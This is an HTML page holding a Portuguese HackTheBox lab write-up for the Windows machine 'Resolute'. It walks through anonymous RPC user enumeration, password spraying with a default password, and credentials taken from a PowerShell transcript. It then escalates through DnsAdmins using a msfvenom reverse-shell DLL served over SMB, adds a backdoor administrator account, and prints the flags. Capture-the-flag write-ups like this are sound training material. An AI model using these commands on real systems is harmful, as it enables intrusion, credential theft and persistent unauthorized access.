<!DOCTYPE HTML>
<html lang="pt" class="sidebar-visible no-js ayu">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>HTB-Windows-Medium-Resolute - WriteUps HackTheBox - by JavaliMZ</title>


        <!-- Custom HTML head -->
        <!-- Content here gets appended to the <html><head> of all the pages -->
        <!-- Global site tag (gtag.js) - Google Analytics -->
        <script
        	async
        	src='https://www.googletagmanager.com/gtag/js?id=G-ZCM4NEDCZB'
        ></script>
        <script>
        	window.dataLayer = window.dataLayer || []; function
        	gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config',
        	'G-ZCM4NEDCZB');
        </script>
        <!-- Custom HTML head: Twitter support -->
        <script
        	async
        	src='https://platform.twitter.com/widgets.js'
        	charset='utf-8'
        ></script>
        
        <meta
        	name='google-site-verification'
        	content='g05a2qliKESUMKBSl7XG8sosQoaFtDugS6F9MlUbe1Y'
        />
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="icon" href="../favicon.svg">
        <link rel="shortcut icon" href="../favicon.png">
        <link rel="stylesheet" href="../css/variables.css">
        <link rel="stylesheet" href="../css/general.css">
        <link rel="stylesheet" href="../css/chrome.css">

        <!-- Fonts -->
        <link rel="stylesheet" href="../FontAwesome/css/font-awesome.css">
        <link rel="stylesheet" href="../fonts/fonts.css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="../highlight.css">
        <link rel="stylesheet" href="../tomorrow-night.css">
        <link rel="stylesheet" href="../ayu-highlight.css">

        <!-- Custom theme stylesheets -->
        <link rel="stylesheet" href="../theme/css/additional.css">

    </head>
    <body>
        <!-- Provide site root to javascript -->
        <script type="text/javascript">
            var path_to_root = "../";
            var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "ayu" : "ayu";
        </script>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script type="text/javascript">
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script type="text/javascript">
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
            if (theme === null || theme === undefined) { theme = default_theme; }
            var html = document.querySelector('html');
            html.classList.remove('no-js')
            html.classList.remove('ayu')
            html.classList.add(theme);
            html.classList.add('js');
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script type="text/javascript">
            var html = document.querySelector('html');
            var sidebar = 'hidden';
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <div class="sidebar-scrollbox">
                <ol class="chapter"><li class="chapter-item "><a href="../index.html"><strong aria-hidden="true">1.</strong> Introdução</a></li><li class="chapter-item expanded "><a href="../Windows.html"><strong aria-hidden="true">2.</strong> Máquinas Windows</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../HTB/HTB-Windows-Easy-Omni.html"><strong aria-hidden="true">2.1.</strong> HTB-Windows-Easy-Omni</a></li><li class="chapter-item "><a href="../HTB/HTB-Windows-Easy-Sauna.html"><strong aria-hidden="true">2.2.</strong> HTB-Windows-Easy-Sauna</a></li><li class="chapter-item expanded "><a href="../HTB/HTB-Windows-Medium-Resolute.html" class="active"><strong aria-hidden="true">2.3.</strong> HTB-Windows-Medium-Resolute</a></li><li class="chapter-item "><a href="../HTB/HTB-Windows-Medium-Cascade.html"><strong aria-hidden="true">2.4.</strong> HTB-Windows-Medium-Cascade</a></li><li class="chapter-item "><a href="../HTB/HTB-Windows-Hard-Blackfield.html"><strong aria-hidden="true">2.5.</strong> HTB-Windows-Hard-Blackfield</a></li><li class="chapter-item "><a href="../HTB/HTB-Windows-Insane-Bankrobber.html"><strong aria-hidden="true">2.6.</strong> HTB-Windows-Insane-Bankrobber</a></li><li class="chapter-item "><a href="../HTB/HTB-Windows-Insane-APT.html"><strong aria-hidden="true">2.7.</strong> HTB-Windows-Insane-APT</a></li></ol></li><li class="chapter-item "><a href="../Linux.html"><strong aria-hidden="true">3.</strong> Máquinas Linux</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../HTB/HTB-Linux-Easy-Pandora.html"><strong aria-hidden="true">3.1.</strong> HTB-Linux-Easy-Pandora</a></li><li class="chapter-item "><a href="../HTB/HTB-Linux-Easy-Precious.html"><strong aria-hidden="true">3.2.</strong> HTB-Linux-Easy-Precious</a></li><li class="chapter-item "><a href="../HTB/HTB-Linux-Hard-Falafel.html"><strong aria-hidden="true">3.3.</strong> HTB-Linux-Hard-Falafel</a></li></ol></li><li class="chapter-item "><a href="../CiberSeguranca.html"><strong aria-hidden="true">4.</strong> Trabalhos do Curso de Ciber Segurança</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../CursoCiberSeguranca/Trabalho2/Trabalho2.html"><strong aria-hidden="true">4.1.</strong> Acesso Remoto (SSH)</a></li><li class="chapter-item "><a href="../CursoCiberSeguranca/Trabalho3/Trabalho3.html"><strong aria-hidden="true">4.2.</strong> Configuração avançada de um servidor SSH</a></li><li class="chapter-item "><a href="../CursoCiberSeguranca/Trabalho5/Trabalho5.html"><strong aria-hidden="true">4.3.</strong> Servidor Web com nginx e virtualhost</a></li><li class="chapter-item "><a href="../CursoCiberSeguranca/SELinux/TrabalhoSELinux.html"><strong aria-hidden="true">4.4.</strong> SELinux</a></li></ol></li></ol>
            </div>
            <div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
        </nav>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                                <div id="menu-bar-hover-placeholder"></div>
                <div id="menu-bar" class="menu-bar sticky bordered">
                    <div class="left-buttons">
                        <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                            <i class="fa fa-bars"></i>
                        </button>
                        <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                            <i class="fa fa-paint-brush"></i>
                        </button>
                        <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                            <li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu (default)</button></li>
                        </ul>
                        <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                            <i class="fa fa-search"></i>
                        </button>
                    </div>

                    <h1 class="menu-title">WriteUps HackTheBox - by JavaliMZ</h1>

                    <div class="right-buttons">

                    </div>
                </div>

                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script type="text/javascript">
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <ol>
<li><a href="#resolu%C3%A7%C3%A3o-da-m%C3%A1quina-resolute">Resolução da máquina <strong>Resolute</strong></a> 1. <a href="#m%C3%A1quina-medium-hacktheboxcom">Máquina Medium (hackthebox.com)</a> 2. <a href="#by-javalimz---17092021">by <strong><em>JavaliMZ</em></strong> - 17/09/2021</a></li>
<li><a href="#enumera%C3%A7%C3%A3o">Enumeração</a>
<ol>
<li><a href="#servidor-samba">Servidor Samba</a></li>
<li><a href="#servidor-rpc">Servidor RPC</a></li>
</ol>
</li>
<li><a href="#privesc">PrivEsc</a></li>
<li><a href="#grupo-megabankdnsadmins">Grupo MEGABANK\DnsAdmins</a>
<ol>
<li><a href="#cria%C3%A7%C3%A3o-do-ficheirodll-malicioso">Criação do ficheiro.dll malicioso</a></li>
</ol>
</li>
<li><a href="#we-are-authoritysystem">We are authority\system</a></li>
</ol>
<p><img src="Assets/HTB-Windows-Medium-Resolute/icon.webp" alt="" /></p>
<img src="https://img.shields.io/badge/Resolute-HackTheBox-green?style=plastic" width="200">
<h1 id="resolução-da-máquina-resolute"><a class="header" href="#resolução-da-máquina-resolute">Resolução da máquina <strong>Resolute</strong></a></h1>
<h4 id="máquina-medium-hacktheboxcom"><a class="header" href="#máquina-medium-hacktheboxcom">Máquina Medium (hackthebox.com)</a></h4>
<h4 id="by-javalimz---17092021"><a class="header" href="#by-javalimz---17092021">by <strong><em>JavaliMZ</em></strong> - 17/09/2021</a></h4>
<hr />
<hr />
<h1 id="enumeração"><a class="header" href="#enumeração">Enumeração</a></h1>
<p>A primeira fase de todo e qualquer PenTesting é a fase de enumeração. Para isso, irei utilizar a clássica ferramenta NMAP.</p>
<p><img src="Assets/HTB-Windows-Medium-Resolute/Enum-nmap-allPorts.png" alt="Enumeração de todas as portas" /></p>
<p>Montes de portas para esta máquina! Ainda nunca me lembrei de falar de uma função que tenho definida a nível de zshrc. Para quem segue o S4vitar, sabe certamente da sua utilidade <strong><em>&quot;exctractports&quot;</em></strong> (Atenção à prenuncia: igzxtráááááctPóórt). E para quem não conhece, recomendo vivamente!! (https://www.youtube.com/channel/UCNHWpNqiM8yOQcHXtsluD7Q). Alterei um pouco a função dele para se adequar ao meu ambiente WSL2 e para copiar para clipboard não só as portas, mas também o &quot;nmap <IP> -p<Portas>&quot; e a seguir é que ponho manualmente os parâmetros que quero.</p>
<pre><code class="language-bash">extractPorts () {
	reset=&quot;\e[0m&quot;
	amarelo=&quot;\e[1;33m&quot;
	verde=&quot;\e[1;32m&quot;
	vermelho=&quot;\e[1;31m&quot;
	checkAmarelo=&quot;$amarelo [*]$reset&quot;
	check=&quot;  $verde✔$reset&quot;
	ports=$(cat $1 | grep -oP '(?&lt;=Ports:).*' | sed &quot;s/,/\n/g&quot; | sed 's/\// /g' | awk '{print $1}' | tr '\n' ',' | sed 's/,$/\n/')
	portsComEspacos=$(cat $1 | grep -oP '(?&lt;=Ports:).*' | sed &quot;s/,/\n/g&quot; | sed 's/\// /g' | awk '{print $1}' | tr '\n' ',' | sed 's/,$/\n/' | sed 's/,/, /g')
	ip=$(cat $1 | grep Host | awk '{print $2}' | uniq)
	echo &quot;Enumeração das portas:\n&quot; &gt; /tmp/nmapTmp.txt
	echo &quot;$checkAmarelo \tIP Address: $ip&quot; &gt;&gt; /tmp/nmapTmp.txt
	echo &quot;$checkAmarelo \tOpen Ports: $portsComEspacos \n&quot; &gt;&gt; /tmp/nmapTmp.txt
	cmd=&quot;nmap -p$ports $ip&quot;
	echo &quot;$verde Sugestão (copiado em clipboard):$reset \t\t $cmd&quot; &gt;&gt; /tmp/nmapTmp.txt
	/usr/bin/batcat /tmp/nmapTmp.txt
	rm /tmp/nmapTmp.txt
	echo &quot;$cmd&quot; | clip.exe
}
</code></pre>
<p><img src="Assets/HTB-Windows-Medium-Resolute/Enum-nmap-A_txt.png" alt="Função extractPort" /></p>
<pre><code class="language-txt"># Nmap 7.91 scan initiated Fri Sep 17 09:53:36 2021 as: nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49688,49711,54059 -sC -sV -Pn -oN enumeration/nmap-A.txt 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.041s latency).

PORT      STATE  SERVICE      VERSION
53/tcp    open   domain       Simple DNS Plus
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-17 09:00:45Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49671/tcp open   msrpc        Microsoft Windows RPC
49676/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open   msrpc        Microsoft Windows RPC
49688/tcp open   msrpc        Microsoft Windows RPC
49711/tcp open   msrpc        Microsoft Windows RPC
54059/tcp closed unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h27m02s, deviation: 4h02m32s, median: 7m00s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2021-09-17T02:01:38-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-09-17T09:01:37
|_  start_date: 2021-09-16T18:30:10

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 17 09:54:44 2021 -- 1 IP address (1 host up) scanned in 67.49 seconds
</code></pre>
<p>Esta máquina é muito provavelmente um Active Directory / Domain Controller (AD/DC). Tem kerberos, samba, winrm, ldap...</p>
<p>Neste momento, temos escolha, mas o caminho que recomendo seguir é tentar entrar nos diversos serviços anonimamente ou com unuário &quot;null&quot; ou &quot;guest&quot;.</p>
<h2 id="servidor-samba"><a class="header" href="#servidor-samba">Servidor Samba</a></h2>
<p>Por Samba, não nos é possível ver nada, a não ser o nome de domain e nome da máquina</p>
<p><img src="Assets/HTB-Windows-Medium-Resolute/Enum-smb.png" alt="Crackmapexec --shares" /></p>
<p>Com outras ferramentas como smbclient ou smbmap também não se pode enumerar nada de interessante...</p>
<h2 id="servidor-rpc"><a class="header" href="#servidor-rpc">Servidor RPC</a></h2>
<p>Com <strong>&quot;rpcclient&quot;</strong> a coisa é diferente. Já se pode entrar em modo anónimo com usuário &quot;&quot; (vazio)</p>
<pre><code class="language-bash">rpcclient -U '' 10.10.10.169 -N
</code></pre>
<p>Desta forma entramos em modo interativo e é possível introduzir comandos, tendo neste caso respostas. Mas esta ferramenta também pode ser usada com o parametro &quot;-c&quot; que nos permite enviar o commando, e obter resposta em output normal.</p>
<pre><code class="language-bash">rpcclient -U '' 10.10.10.169 -N -c 'enumdomusers'
#&gt;  user:[Administrator] rid:[0x1f4]
#&gt;  user:[Guest] rid:[0x1f5]
#&gt;  user:[krbtgt] rid:[0x1f6]
#&gt;  user:[DefaultAccount] rid:[0x1f7]
#&gt;  user:[ryan] rid:[0x451]
#&gt;  user:[marko] rid:[0x457]
#&gt;  user:[sunita] rid:[0x19c9]
#&gt;  user:[abigail] rid:[0x19ca]
#&gt;  user:[marcus] rid:[0x19cb]
#&gt;  user:[sally] rid:[0x19cc]
#&gt;  user:[fred] rid:[0x19cd]
#&gt;  user:[angela] rid:[0x19ce]
#&gt;  user:[felicia] rid:[0x19cf]
#&gt;  user:[gustavo] rid:[0x19d0]
#&gt;  user:[ulf] rid:[0x19d1]
#&gt;  user:[stevie] rid:[0x19d2]
#&gt;  user:[claire] rid:[0x19d3]
#&gt;  user:[paulo] rid:[0x19d4]
#&gt;  user:[steve] rid:[0x19d5]
#&gt;  user:[annette] rid:[0x19d6]
#&gt;  user:[annika] rid:[0x19d7]
#&gt;  user:[per] rid:[0x19d8]
#&gt;  user:[claude] rid:[0x19d9]
#&gt;  user:[melanie] rid:[0x2775]
#&gt;  user:[zach] rid:[0x2776]
#&gt;  user:[simon] rid:[0x2777]
#&gt;  user:[naoki] rid:[0x2778]
</code></pre>
<p>Desta forma, podemos filtar o output, exportar para ficheiro e tal, como qualquer outro commando do sistema.</p>
<p>A primeira a coisa a fazer é gravar para um ficheiro todos os usernames</p>
<pre><code class="language-bash">rpcclient -U '' 10.10.10.169 -N -c 'enumdomusers' | awk '{print $1}' | grep -oP '\[.*?\]' | tr -d &quot;[]&quot; &gt; contents/users
</code></pre>
<p>Depois disso, podemos extrair mais informações. O RPC funciona com queries ao rid e não ao username.</p>
<pre><code class="language-bash">rpcclient -U '' 10.10.10.169 -N -c 'enumdomusers' | awk '{print $2}' | grep -oP '\[.*?\]' | tr -d &quot;[]&quot; | xargs
#&gt; 0x1f4 0x1f5 0x1f6 0x1f7 0x451 0x457 0x19c9 0x19ca 0x19cb 0x19cc 0x19cd 0x19ce 0x19cf 0x19d0 0x19d1 0x19d2 0x19d3 0x19d4 0x19d5 0x19d6 0x19d7 0x19d8 0x19d9 0x2775 0x2776 0x2777 0x2778
</code></pre>
<p>Com todos os rids, podemos pedir detalhes de cada um e filtrar apenas os campos que nos interessa usando vários rpcclient com apenas uma linha de commando...</p>
<p>O que nos interessa por enquanto é obter informações básica. Queremos saber os nomes de usuários, e se o mesmo foi criado com alguma descrição que possamos usar no futuro. Em empresas, é comum mencionar dados sensíveis no campo de descrição quando o administrador cria um novo usuário (password por defeito, função, email, contacto telefónico...). É claro que, para um CaptureTheFlag, o número de telefone não me é muito util (provavelmente ser um fictício lol), mas uma palavra passe dá sempre jeito =).</p>
<pre><code class="language-bash">for rid in $(rpcclient -U '' 10.10.10.169 -N -c 'enumdomusers' | awk '{print $2}' | grep -oP '\[.*?\]' | tr -d &quot;[]&quot;); do echo; rpcclient -U '' 10.10.10.169 -N -c &quot;queryuser $rid&quot; | grep -E &quot;User Name|Description&quot;; done

#&gt;          User Name   :   Administrator
#&gt;          Description :   Built-in account for administering the computer/domain
#&gt;
#&gt;          User Name   :   Guest
#&gt;          Description :   Built-in account for guest access to the computer/domain
#&gt;
#&gt;          User Name   :   krbtgt
#&gt;          Description :   Key Distribution Center Service Account
#&gt;
#&gt;          User Name   :   DefaultAccount
#&gt;          Description :   A user account managed by the system.
#&gt;
#&gt;          User Name   :   ryan
#&gt;          Description :
#&gt;
#&gt;          User Name   :   marko
#&gt;          Description :   Account created. Password set to Welcome123!
#&gt;
#&gt;          User Name   :   sunita
#&gt;  		...
</code></pre>
<p>Aí está! <strong>Account created. Password set to Welcome123!</strong>. Isto é promissor.</p>
<p>Vamos validar a palavra passe sempre da mesma maneira... Com recurso ao crackmapexec</p>
<p><img src="Assets/HTB-Windows-Medium-Resolute/crackmapexec-login-marko-failed.png" alt="crackmapexec validation creds marko failed" /></p>
<p>Bem a credencial não está boa! Porquê? Talvés porque esteja errada... Mas temos de pensar mais além! <strong><em>Welcome123!</em></strong> é muito convidativo lol. Poderá ser a password por defeito que o administrador dá quando cria um novo usuário, e para todos os novos usuários... Bem podemos tentar ver se algum usuário foi preguiçoso e não mudou a sua palavra pass...</p>
<p><img src="Assets/HTB-Windows-Medium-Resolute/crackmapexec-melanie-password.png" alt="crackmapexec melanie password" /></p>
<p>Melanie... melanie... A preguicita aguda da nossa amiga Melanie permite-nos entrar via WinRM com a ferramenta evil-winrm</p>
<h1 id="privesc"><a class="header" href="#privesc">PrivEsc</a></h1>
<p>O proximo passo é muito à moda CTF (acho eu). É perciso encontrar um ficheiro oculto que contém umas credenciais de um outro usuário que está num grupo assim especial ;).</p>
<p>O ficheiro está oculto</p>
<pre><code class="language-powershell">cd C:\
dir -Force

#&gt;      Directory: C:\
#&gt;
#&gt;
#&gt;  Mode                LastWriteTime         Length Name
#&gt;  ----                -------------         ------ ----
#&gt;  d--hs-        9/16/2021   2:16 PM                $RECYCLE.BIN
#&gt;  d--hsl        9/25/2019  10:17 AM                Documents and Settings
#&gt;  d-----        9/25/2019   6:19 AM                PerfLogs
#&gt;  d-r---        9/25/2019  12:39 PM                Program Files
#&gt;  d-----       11/20/2016   6:36 PM                Program Files (x86)
#&gt;  d--h--        9/25/2019  10:48 AM                ProgramData
#&gt;  d--h--        12/3/2019   6:32 AM                PSTranscripts
#&gt;  d--hs-        9/25/2019  10:17 AM                Recovery
#&gt;  d--hs-        9/25/2019   6:25 AM                System Volume Information
#&gt;  d-r---        12/4/2019   2:46 AM                Users
#&gt;  d-----        12/4/2019   5:15 AM                Windows
#&gt;  -arhs-       11/20/2016   5:59 PM         389408 bootmgr
#&gt;  -a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
#&gt;  -a-hs-        9/16/2021  11:29 AM      402653184 pagefile.sys

cd &quot;C:/PSTranscripts&quot;
dir -Force

#&gt;      Directory: C:\PSTranscripts
#&gt;
#&gt;
#&gt;  Mode                LastWriteTime         Length Name
#&gt;  ----                -------------         ------ ----
#&gt;  d--h--        12/3/2019   6:45 AM                20191203

cd &quot;C:/PSTranscripts/20191203&quot;
dir -Force

#&gt;      Directory: C:\PSTranscripts\20191203
#&gt;
#&gt;
#&gt;  Mode                LastWriteTime         Length Name
#&gt;  ----                -------------         ------ ----
#&gt;  -arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

type &quot;C:/PSTranscripts/20191203/PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt&quot;

# Pelo meio da resposta, vê-se o seguinte:

#&gt;  Command start time: 20191203063515
#&gt;  **********************
#&gt;  PS&gt;CommandInvocation(Invoke-Expression): &quot;Invoke-Expression&quot;
#&gt;  &gt;&gt; ParameterBinding(Invoke-Expression): name=&quot;Command&quot;; value=&quot;cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
</code></pre>
<blockquote>
<p>A nova credencial é ryan:Serv3r4Admin4cc123!</p>
</blockquote>
<p>Vamos validar estas novas credenciais com crackmapexec (como sempre...)</p>
<p><img src="Assets/HTB-Windows-Medium-Resolute/PrivEsc-ryan-pwned.png" alt="WinRM login com usuário ryan" /></p>
<p>Ambos os serviços indicam <strong><em>(Pwn3d!)</em></strong>, O que significa que podemos executar commando tanto pelo crackmapexec em modo smb com o parametro &quot;-x&quot;, como por WinRM. Mas como é mais directo por WinRM, não me vou privar...</p>
<p>Vimos na foto o tal grupo.</p>
<h1 id="grupo-megabankdnsadmins"><a class="header" href="#grupo-megabankdnsadmins">Grupo MEGABANK\DnsAdmins</a></h1>
<p>Este group permite aos seus membros configurar, iniciar, e parar o serviço dns do windows. O serviço DNS pode carregar configurações a partir de ficheiros.dll. E este serviço é iniciado com privilégios máximos de Authority System! Posto isso, é fácil elaborar um exploit para nos converter-mos em administrador da máquina. O commando que queremo que o alvo execute é um reverse shell</p>
<h2 id="criação-do-ficheirodll-malicioso"><a class="header" href="#criação-do-ficheirodll-malicioso">Criação do ficheiro.dll malicioso</a></h2>
<pre><code class="language-bash">[Environment]::Is64BitOperatingSystem
#&gt;  True
</code></pre>
<p>A máquina é de 64 bits, portanto o reverse shell terá de 64 bits</p>
<pre><code class="language-bash">msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.12 LPORT=443 -f dll -o rev.dll
</code></pre>
<p>Iremos agora transferir o ficheiro para a máquina alvo com, por exemplo, certutil:</p>
<p><img src="Assets/HTB-Windows-Medium-Resolute/dnsadmin-blocked_by_antivirus.png" alt="Antivirus bloqueia o rev.dll" /></p>
<p>OH SHIT! O antivírus está ativo... Temos 2 soluções, ou ofuscar o código (que pode levar alguma tentativas porque não fica um ficheiro limpo) ou partilhar um servidor Samba, porque o dll malicioso pode ser chamado a partir de fora da máquina alvo!</p>
<pre><code class="language-bash">sudo smbserver.py smbFolder $(pwd) -smb2support  # o reverse shell tem de se encontrar na pasta onde se executa o commando

sudo rlwrap nc -lvnp 443
</code></pre>
<pre><code class="language-powershell">dnscmd /config /serverlevelplugindll \\10.10.14.12\smbFolder\rev.dll
#&gt;  Registry property serverlevelplugindll successfully reset.
#&gt;  Command completed successfully.

sc.exe stop dns
# Espere uns 5 segundos (Porque é Windows...)

sc.exe start dns
</code></pre>
<p><img src="Assets/HTB-Windows-Medium-Resolute/Authority-system.png" alt="Authority system" /></p>
<h1 id="we-are-authoritysystem"><a class="header" href="#we-are-authoritysystem">We are authority\system</a></h1>
<p>A partir daí, podemos recuperar as flags... Mas antes, apenas para o fun, vamos criar uma certa persistência. Podemos criar um usuário, e adicioná-lo ao grupo de Administradores para poder entrar sempre que quisermos via WinRM.</p>
<pre><code class="language-powershell">net user javali J4v4li123! /add
net localgroup Administrators javali /add
</code></pre>
<p>Vamos validar com crackmapexec, e tentar entrar via WinRM</p>
<p><img src="Assets/HTB-Windows-Medium-Resolute/Authority_javali.png" alt="Authority javali" /></p>
<p><img src="Assets/HTB-Windows-Medium-Resolute/swag.jfif" alt="Swag xD" /></p>
<pre><code class="language-powershell"># Flags parciais

(type C:\Users\melanie\Desktop\user.txt).substring(0,15)
#&gt;  0c3be45fcfe2497
(type C:\Users\Administrator\Desktop\root.txt).substring(0,15)
#&gt;  e1d94876a506850
</code></pre>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                            <a rel="prev" href="../HTB/HTB-Windows-Easy-Sauna.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                                <i class="fa fa-angle-left"></i>
                            </a>

                            <a rel="next" href="../HTB/HTB-Windows-Medium-Cascade.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                <i class="fa fa-angle-right"></i>
                            </a>

                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                    <a rel="prev" href="../HTB/HTB-Windows-Easy-Sauna.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                        <i class="fa fa-angle-left"></i>
                    </a>

                    <a rel="next" href="../HTB/HTB-Windows-Medium-Cascade.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                        <i class="fa fa-angle-right"></i>
                    </a>
            </nav>

        </div>




        <script type="text/javascript">
            window.playground_copyable = true;
        </script>


        <script src="../elasticlunr.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="../mark.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="../searcher.js" type="text/javascript" charset="utf-8"></script>

        <script src="../clipboard.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="../highlight.js" type="text/javascript" charset="utf-8"></script>
        <script src="../book.js" type="text/javascript" charset="utf-8"></script>

        <!-- Custom JS scripts -->


    </body>
</html>
